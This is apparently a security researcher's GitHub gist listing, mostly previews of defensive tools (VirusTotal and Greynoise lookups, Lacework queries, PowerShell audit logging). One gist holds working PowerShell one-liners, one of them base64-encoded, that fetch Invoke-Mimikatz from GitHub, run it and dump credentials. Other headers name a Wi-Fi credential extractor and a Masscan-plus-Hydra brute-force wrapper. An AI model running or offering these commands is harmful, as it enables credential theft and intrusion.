Greg Foss gfoss
gfoss
/ Extract-WiFi-Creds.ps1
Last active
February 1, 2022 13:06
Simple script to extract locally-stored Wi-Fi Credentials
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #====================================# | |
| # Extract Wi-Fi Credentials # | |
| # greg . foss @ owasp . org # | |
| # v0.1 -- July, 2017 # | |
| #====================================# | |
| # Licensed under the MIT License | |
| <# |
gfoss
/ VirusTotal IP Address Analysis
Last active
February 3, 2022 18:01
Quickly obtain reputation information for IP Addresses from VirusTotal - for both single and bulk IP addresses
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # VirusTotal IP Check | |
| # v0.3 - February, 2022 | |
| # greg.foss@owasp.org | |
| ''' | |
| Licensed under the Apache License, Version 2.0 (the "License"); | |
| you may not use this file except in compliance with the License. | |
| You may obtain a copy of the License at |
gfoss
/ VirusTotal Hash Analysis
Last active
February 3, 2022 20:55
Quickly obtain reputation information for Hashes from VirusTotal - for both single and bulk Hahes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # VirusTotal Hash Check | |
| # v0.3 - February, 2022 | |
| # greg.foss@owasp.org | |
| ''' | |
| Licensed under the Apache License, Version 2.0 (the "License"); | |
| you may not use this file except in compliance with the License. | |
| You may obtain a copy of the License at |
gfoss
/ VirusTotal Domain Analysis
Last active
February 5, 2022 02:11
Quickly obtain reputation information for Domains from VirusTotal - for both single and bulk Domains
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # VirusTotal DNS Check | |
| # v0.1 - February, 2022 | |
| # greg.foss@owasp.org | |
| ''' | |
| Licensed under the Apache License, Version 2.0 (the "License"); | |
| you may not use this file except in compliance with the License. | |
| You may obtain a copy of the License at |
gfoss
/ Greynoise IP Analysis
Last active
February 12, 2022 00:18
Quickly obtain reputation information for IP Addresses from Greynoise - for both single and bulk IP's
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # Greynoise Community Edition - IP Check | |
| # v0.1 - February, 2022 | |
| # greg.foss@owasp.org | |
| ''' | |
| Licensed under the Apache License, Version 2.0 (the "License"); | |
| you may not use this file except in compliance with the License. | |
| You may obtain a copy of the License at |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # LQL Runner | |
| # Lacework Labs | |
| # v0.1 - February 2022 | |
| # greg.foss@lacework.net | |
| ##################################################################################### | |
| # usage: lql-runner.py [-h] [-e LW_ENV] [-q QUERY] [-t DAYS] [-c] [-j] [-o FILENAME] | |
| # |
gfoss
/ happy-fam.py
Last active
May 24, 2022 14:40
Correlate Parent and Child Process Events via the Lacework Query Language (LQL)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # Happy Fam | |
| # LQL-Driven Parent and Child Process Analyzer | |
| # Lacework Labs | |
| # v0.1 - May 2022 | |
| # greg.foss@lacework.net | |
| ''' | |
| Licensed under the Apache License, Version 2.0 (the "License"); |
gfoss
/ PowerShell Command Line Logging
Last active
August 4, 2023 18:02
Detect and alert on nefarious PowerShell command line activity
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerShell Audit Logging for LogRhythm SIEM - 2015 | |
| # For detecting dangerous PowerShell Commands/Functions | |
| Log Source Type: | |
| MS Event Log for Win7/Win8/2008/2012 - PowerShell | |
| Add this file to your PowerShell directory to enable verbose command line audit logging | |
| profile.ps1 | |
| $LogCommandHealthEvent = $true | |
| $LogCommandLifeCycleEvent = $true |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| *NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!* | |
| #mimikatz [local] | |
| IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds; | |
| #encoded-mimikatz [local] | |
| powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBl |
gfoss
/ auto-hydra.sh
Created
August 3, 2017 03:16
Simple Masscan + Hydra wrapper used to perform automated scans by group (organization, unit, team, etc) and generate a report on the results.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # @heinzarelli | |
| # greg . foss [at] logrhythm . com | |
| # v0.1 - May 2017 | |
| # | |
| function usage { | |
| echo "" |